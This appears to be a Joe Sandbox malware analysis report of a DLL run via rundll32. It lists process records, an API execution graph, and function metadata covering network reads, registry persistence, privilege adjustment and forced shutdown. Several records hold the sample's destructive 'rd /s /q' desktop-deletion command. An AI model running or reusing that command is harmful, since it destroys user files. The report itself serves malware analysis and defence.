                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:17
                                                                                                                                                                        Start time:09:44:16
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject
                                                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:18
                                                                                                                                                                        Start time:09:44:16
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",InputFile
                                                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:19
                                                                                                                                                                        Start time:09:44:16
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",PrintFile
                                                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:20
                                                                                                                                                                        Start time:09:44:16
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:21
                                                                                                                                                                        Start time:09:44:16
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff68cce0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:23
                                                                                                                                                                        Start time:09:44:16
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 672
                                                                                                                                                                        Imagebase:0xe90000
                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:24
                                                                                                                                                                        Start time:09:44:16
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                                        File size:18'944 bytes
                                                                                                                                                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:26
                                                                                                                                                                        Start time:09:44:44
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject
                                                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:27
                                                                                                                                                                        Start time:09:44:45
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:28
                                                                                                                                                                        Start time:09:44:45
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff68cce0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:29
                                                                                                                                                                        Start time:09:44:45
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                                        File size:18'944 bytes
                                                                                                                                                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:32
                                                                                                                                                                        Start time:09:44:53
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject
                                                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:33
                                                                                                                                                                        Start time:09:44:53
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:34
                                                                                                                                                                        Start time:09:44:53
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff68cce0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:35
                                                                                                                                                                        Start time:09:44:53
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                                        File size:18'944 bytes
                                                                                                                                                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Disassembly

                                                                                                                                                                        Reset < >

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:3.9%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0.8%
                                                                                                                                                                          Total number of Nodes:360
                                                                                                                                                                          Total number of Limit Nodes:22
                                                                                                                                                                          execution_graph 29727 10006f01 29728 10006f0e 29727->29728 29747 10001000 29728->29747 29730 10006f1b 29731 10001000 6 API calls 29730->29731 29733 10006f29 29731->29733 29732 1000592e lstrcmpiA CloseHandle CreateToolhelp32Snapshot Process32First Process32Next 29732->29733 29733->29732 29734 10006f42 Sleep 29733->29734 29735 10006f4f 29733->29735 29734->29733 29736 10001000 6 API calls 29735->29736 29737 10006fa6 29736->29737 29738 10001000 6 API calls 29737->29738 29745 10006fbd 29738->29745 29743 10007076 Sleep 29743->29745 29744 100070b5 wsprintfA 29744->29745 29745->29743 29745->29744 29746 100070eb PrintFile PrintFile 29745->29746 29751 10005c5e 29745->29751 29766 10003ef4 29745->29766 29769 100061cf 29745->29769 29789 10004139 29745->29789 29746->29745 29748 100016c0 29747->29748 29793 10021753 29748->29793 29750 10001804 ctype 29750->29730 29752 10003ef4 wvsprintfA 29751->29752 29753 10005c98 29752->29753 29798 10003f72 PathFileExistsA 29753->29798 29755 10005ca4 29756 10005cab 29755->29756 29757 10005caf 29755->29757 29756->29745 29799 10004015 CreateFileA 29757->29799 29759 10005ccd 29759->29756 29800 10004035 ReadFile 29759->29800 29761 10005ce8 29801 10003f92 CloseHandle 29761->29801 29763 10005cee 29802 10003f7d StrStrIA 29763->29802 29765 10005cfb 29765->29756 29803 10003ee1 wvsprintfA 29766->29803 29768 10003f06 29768->29745 29770 10001000 6 API calls 29769->29770 29771 100061ef 29770->29771 29804 10003f0a InternetOpenA 29771->29804 29773 100061f6 29783 10006200 29773->29783 29805 10003f24 InternetOpenUrlA 29773->29805 29775 10006218 29776 10006222 29775->29776 29777 1000622b 29775->29777 29806 10003f58 InternetCloseHandle 29776->29806 29779 10006288 29777->29779 29786 1000627e 29777->29786 29807 10003f41 InternetReadFile 29777->29807 29808 1000cd60 7 API calls 29777->29808 29810 10003f58 InternetCloseHandle 29779->29810 29781 10006228 29811 10003f58 InternetCloseHandle 29781->29811 29783->29745 29809 10003f92 CloseHandle 29786->29809 29788 10006286 29788->29779 29791 10004146 29789->29791 29790 1000429c 29790->29745 29791->29790 29812 10028ac7 6 API calls 29791->29812 29794 10021758 29793->29794 29797 1002f839 6 API calls 29794->29797 29798->29755 29799->29759 29800->29761 29801->29763 29802->29765 29803->29768 29804->29773 29805->29775 29806->29781 29807->29777 29809->29788 29810->29781 29811->29783 29813 10006b42 29814 10006b60 29813->29814 29821 10003ece CreateMutexA 29814->29821 29816 10006b73 GetLastError 29817 10006b84 CreateThread 29816->29817 29819 10006bb3 29816->29819 29818 10006b9e 29817->29818 29822 10006890 29817->29822 29820 10006ba6 Sleep 29818->29820 29820->29817 29821->29816 29823 100062f3 12 API calls 29822->29823 29825 10006888 29822->29825 29823->29825 29827 10006905 29825->29827 29828 100062f3 29825->29828 29847 10005dc6 29825->29847 29829 10006326 29828->29829 29831 1000643c 29829->29831 29868 1001f2aa 6 API calls ctype 29829->29868 29861 10005858 29831->29861 29842 10006483 29842->29825 29848 10005df7 29847->29848 29853 10005e30 29848->29853 29879 1000409d RegQueryValueExA 29848->29879 29850 10005e28 29903 10004092 RegCloseKey 29850->29903 29880 100058b6 29853->29880 29854 10005e5b 29855 10003ef4 wvsprintfA 29854->29855 29856 10005e9b 29855->29856 29886 10005d09 29856->29886 29859 10003ef4 wvsprintfA 29860 10005ef3 29859->29860 29860->29825 29862 1000585f 29861->29862 29864 10005874 29862->29864 29869 10003eb4 gethostbyname 29862->29869 29865 10030f53 29864->29865 29870 1003464a 29865->29870 29867 10030f59 29867->29842 29869->29864 29871 10034659 29870->29871 29874 1002f9b4 29870->29874 29872 10034662 29871->29872 29878 10025ad9 6 API calls ctype 29871->29878 29872->29867 29876 100292fd 29874->29876 29877 1001ecb2 6 API calls 29874->29877 29876->29867 29878->29872 29879->29850 29881 1000592a 29880->29881 29882 100058c6 29880->29882 29881->29854 29882->29881 29883 10005989 29882->29883 29904 10003f92 CloseHandle 29883->29904 29885 10005991 29885->29854 29887 10003ef4 wvsprintfA 29886->29887 29888 10005d43 29887->29888 29905 10003f72 PathFileExistsA 29888->29905 29890 10005d4f 29891 10005d56 29890->29891 29892 10005d5a 29890->29892 29891->29859 29891->29860 29906 10004015 CreateFileA 29892->29906 29894 10005d78 29894->29891 29907 10004035 ReadFile 29894->29907 29896 10005d93 29908 10003f92 CloseHandle 29896->29908 29898 10005d99 29909 10003f7d StrStrIA 29898->29909 29900 10005da6 29900->29891 29910 10003f7d StrStrIA 29900->29910 29902 10005dba 29902->29891 29903->29853 29904->29885 29905->29890 29906->29894 29907->29896 29908->29898 29909->29900 29910->29902 30113 10002523 30114 10002528 30113->30114 30115 10001000 6 API calls 30114->30115 30116 10002532 30115->30116 30119 10024275 30116->30119 30120 10024294 30119->30120 30123 1003b76d 30120->30123 30122 100242b0 30125 1002c21b 9 API calls 30123->30125 30126 10007124 30131 1000713b 30126->30131 30127 10005c5e 6 API calls 30127->30131 30128 10003ef4 wvsprintfA 30128->30131 30129 100061cf 9 API calls 30129->30131 30130 100071c9 Sleep 30130->30131 30131->30127 30131->30128 30131->30129 30131->30130 30132 1000721a wsprintfA 30131->30132 30132->30131 30133 1000d269 30136 1000d2b2 30133->30136 30135 1000d271 ctype 30137 1000d2c2 30136->30137 30138 1000d2d6 30137->30138 30140 1001e0d0 30137->30140 30138->30135 30141 1001e0ea 30140->30141 30147 1001e101 ctype 30140->30147 30142 1001e0f7 30141->30142 30143 1001f2a4 ctype 30141->30143 30148 1001d665 30142->30148 30152 10024179 6 API calls 30143->30152 30149 1001d66a ctype 30148->30149 30153 1001d4bf 8 API calls ctype 30149->30153 30151 100230ad 30153->30151 29919 1000858a Sleep 29920 10001000 6 API calls 29919->29920 29921 100085ad 29919->29921 29920->29921 29922 100061cf 9 API calls 29921->29922 29923 100085d4 29922->29923 29924 100085e6 29923->29924 29925 100085dd Sleep 29923->29925 29926 10008602 wsprintfA 29924->29926 29925->29925 29929 10006852 19 API calls 29926->29929 29928 10008625 29929->29928 30154 10001fab 30155 10001fb0 30154->30155 30156 10001000 6 API calls 30155->30156 30157 10001fba 30156->30157 30160 10024849 30157->30160 30159 10001fc7 30160->30159 30161 1002728e 30160->30161 30162 100272cb CreateThread 30161->30162 30164 1001da36 30162->30164 29930 1000828f 29931 100082ca 29930->29931 29932 10001000 6 API calls 29931->29932 29933 100082f2 29932->29933 29934 10001000 6 API calls 29933->29934 29940 10008309 29934->29940 29935 10005c5e 6 API calls 29935->29940 29936 10003ef4 wvsprintfA 29936->29940 29937 100061cf 9 API calls 29937->29940 29938 100083b1 Sleep 29938->29940 29940->29935 29940->29936 29940->29937 29940->29938 29941 10008402 wsprintfA 29940->29941 29942 10001000 6 API calls 29940->29942 29943 10007231 15 API calls 29940->29943 29941->29940 29942->29940 29943->29940 29944 10025852 29947 10006de7 29944->29947 29946 100251a7 29948 10006df1 29947->29948 29949 10003ef4 wvsprintfA 29948->29949 29950 10006eb2 29949->29950 29959 10006c8c 29950->29959 29952 10006ebe 29953 10001000 6 API calls 29952->29953 29954 10006ecd 29953->29954 29955 10003ef4 wvsprintfA 29954->29955 29956 10006edb 29955->29956 29963 100062a2 29956->29963 29960 10006c99 29959->29960 29974 10006bbf 29960->29974 29962 10006ca6 29962->29952 29964 10001000 6 API calls 29963->29964 29965 100062b4 29964->29965 29982 10003f0a InternetOpenA 29965->29982 29967 100062bb 29968 100062ec 29967->29968 29983 10003f24 InternetOpenUrlA 29967->29983 29968->29946 29970 100062d6 29984 10003f58 InternetCloseHandle 29970->29984 29972 100062e6 29985 10003f58 InternetCloseHandle 29972->29985 29977 10035172 29974->29977 29976 10006bdb 29976->29962 29978 100312a2 29977->29978 29980 10035188 29978->29980 29981 1002f279 6 API calls 29978->29981 29980->29980 29981->29977 29982->29967 29983->29970 29984->29972 29985->29968 30169 10036673 30171 1002461f 30169->30171 30172 1002462c 30171->30172 30174 10031d45 30172->30174 30175 10031d55 30174->30175 30180 1002829b 30174->30180 30176 10031d5b 30175->30176 30183 100282f4 30175->30183 30178 10004494 7 API calls 30176->30178 30179 10036d80 30178->30179 30182 1003849b 30180->30182 30185 10023b24 6 API calls 30180->30185 30186 100311ac 30183->30186 30185->30180 30189 1002870d 30186->30189 30192 100044bf 30189->30192 30191 10021b59 30199 10036273 30192->30199 30194 100044db 30195 100044eb GetExtendedUdpTable 30194->30195 30197 10004516 30194->30197 30196 10004501 30195->30196 30196->30197 30198 1000451b GetExtendedUdpTable 30196->30198 30197->30191 30198->30197 30200 1002be70 30199->30200 30200->30199 30201 1003a759 30200->30201 30203 1002d70b 6 API calls 30200->30203 30201->30194 30203->30199 29986 10001812 29987 10001817 29986->29987 29988 10001000 6 API calls 29987->29988 29989 10001821 29988->29989 29990 100025d2 29991 100025d7 29990->29991 29992 10001000 6 API calls 29991->29992 29993 100025e1 29992->29993 29996 10028391 6 API calls 29993->29996 29997 10006915 29998 10006a76 29997->29998 29999 1000691e 29997->29999 29999->29998 30000 10005f27 AdjustTokenPrivileges LookupPrivilegeValueA OpenProcessToken GetCurrentProcess 29999->30000 30004 10005faa wvsprintfA CloseHandle WriteFile CreateFileA Concurrency::details::platform::__CreateTimerQueueTimer 29999->30004 30005 10003f63 ExitWindowsEx 29999->30005 30006 10030f2d 8 API calls 29999->30006 30000->29999 30004->29999 30005->29999 30007 100087d6 30013 10004494 30007->30013 30010 100087e3 Sleep CreateThread Sleep CreateThread 30011 10008809 Sleep 30010->30011 30019 10006a91 30010->30019 30012 1000880e 30011->30012 30014 10001000 6 API calls 30013->30014 30015 1000449f 30014->30015 30018 100040ba RegOpenKeyExA 30015->30018 30017 100044b6 30017->30010 30017->30011 30018->30017 30020 10006aa5 30019->30020 30028 10003ece CreateMutexA 30020->30028 30022 10006ac6 GetLastError 30023 10006b18 30022->30023 30024 10006ad7 30022->30024 30026 10006b04 CreateThread 30024->30026 30027 10006afb Sleep 30024->30027 30029 100064ab 30024->30029 30026->30023 30027->30024 30028->30022 30030 100064b5 30029->30030 30031 10001000 6 API calls 30030->30031 30032 100064fb wsprintfA 30031->30032 30033 1000651a 30032->30033 30050 10003f0a InternetOpenA 30033->30050 30035 1000653d 30049 100066c2 30035->30049 30051 10003f24 InternetOpenUrlA 30035->30051 30037 1000655d 30037->30049 30052 1003aa52 30037->30052 30039 1000657a 30057 100208ad 30039->30057 30042 100065d1 MultiByteToWideChar 30044 10006592 ctype 30042->30044 30043 100065e9 MultiByteToWideChar 30043->30044 30044->30042 30044->30043 30045 10006659 30044->30045 30060 10003f41 InternetReadFile 30044->30060 30046 100066f1 wsprintfA 30045->30046 30045->30049 30047 10006707 ctype 30046->30047 30061 1001ff50 30047->30061 30049->30024 30050->30035 30051->30037 30053 1003aa5e 30052->30053 30056 1002829b 30052->30056 30055 1003849b 30055->30039 30056->30039 30056->30055 30065 10023b24 6 API calls 30056->30065 30066 10021597 30057->30066 30059 100208b2 30059->30044 30060->30044 30062 10022bd1 30061->30062 30063 10006de7 6 API calls 30062->30063 30064 10022fb2 30063->30064 30065->30056 30069 1001dfdd 12 API calls 30066->30069 30070 1002b195 30071 10008817 30070->30071 30075 1002b19f 30070->30075 30072 10001000 6 API calls 30071->30072 30073 1000883e wsprintfA 30072->30073 30074 1000885e 30073->30074 30076 10008863 Sleep 30074->30076 30077 10008877 30074->30077 30078 10008876 30076->30078 30078->30077 30204 10006ef9 30207 10006d1a 30204->30207 30219 10003ff7 GetShortPathNameA 30207->30219 30209 10006d55 30210 10001000 6 API calls 30209->30210 30211 10006d77 30210->30211 30220 1000406c RegCreateKeyExA 30211->30220 30213 10006d83 wsprintfA 30214 10006dbd 30213->30214 30221 100040d4 RegSetValueExA 30214->30221 30216 10006dd6 30222 10004092 RegCloseKey 30216->30222 30218 10006de1 30219->30209 30220->30213 30221->30216 30222->30218 30079 1000821a 30080 10008223 30079->30080 30082 10008282 Sleep 30080->30082 30083 1000400a GetDriveTypeA 30080->30083 30082->30080 30083->30080 30084 1002875f 30085 1001d84c 30084->30085 30085->30084 30086 10008817 30085->30086 30088 1002e497 30085->30088 30087 10001000 6 API calls 30086->30087 30094 1003591b 30086->30094 30089 1000883e wsprintfA 30087->30089 30096 10008817 10 API calls 30088->30096 30091 1000885e 30089->30091 30092 10008863 Sleep 30091->30092 30093 10008876 30091->30093 30092->30093 30094->30094 30095 10039171 30096->30095 30097 1003281c 30103 10034abc 30097->30103 30099 10032824 CreateThread 30100 10032829 30099->30100 30107 1001eff2 6 API calls 30100->30107 30105 1002829b 30103->30105 30104 1003849b 30104->30099 30105->30099 30105->30104 30108 10023b24 6 API calls 30105->30108 30108->30103 30223 10008bbf 30224 10008bd8 30223->30224 30225 10008c23 30224->30225 30227 1001e698 6 API calls 30224->30227 30227->30225

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 10003F41 Relevance: 1.5, APIs: 1, Instructions: 6filenetworkCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetReadFile.WININET(?,?,?,?), ref: 10003F51
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileInternetRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 778332206-0
                                                                                                                                                                          • Opcode ID: 82b719074b20f935b89b24443a0030266dafc30d3af0f45e12e33eda6027182c
                                                                                                                                                                          • Instruction ID: 64991af82c4176b47a5b2112c671631c23c979084c56eaaf7cabcf31d5835ef9
                                                                                                                                                                          • Opcode Fuzzy Hash: 82b719074b20f935b89b24443a0030266dafc30d3af0f45e12e33eda6027182c
                                                                                                                                                                          • Instruction Fuzzy Hash: 13B00872519392ABDF02DF91CD4482ABAA6BB88301F084C5CF2A541071C7328428EB02
                                                                                                                                                                          Function 10003FB7 Relevance: 1.5, APIs: 1, Instructions: 4processCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000000,00000000,10005943,00000002,00000000,00000000,00000000), ref: 10003FBF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateSnapshotToolhelp32
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3332741929-0
                                                                                                                                                                          • Opcode ID: bb66744035d4238db38a1512a5e6e8de47de2053b5e9d82f09d1f961b31b016d
                                                                                                                                                                          • Instruction ID: 5009357eb275d1e5704b6a5f64a804a4966702db517f425a36799c0ea53529f5
                                                                                                                                                                          • Opcode Fuzzy Hash: bb66744035d4238db38a1512a5e6e8de47de2053b5e9d82f09d1f961b31b016d
                                                                                                                                                                          • Instruction Fuzzy Hash: F5A00275404211BBDA415B50CD44D4ABF61BB98741F01C415F19540034C73585A5DB11
                                                                                                                                                                          Function 10008AD0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                          Download Yara Rule
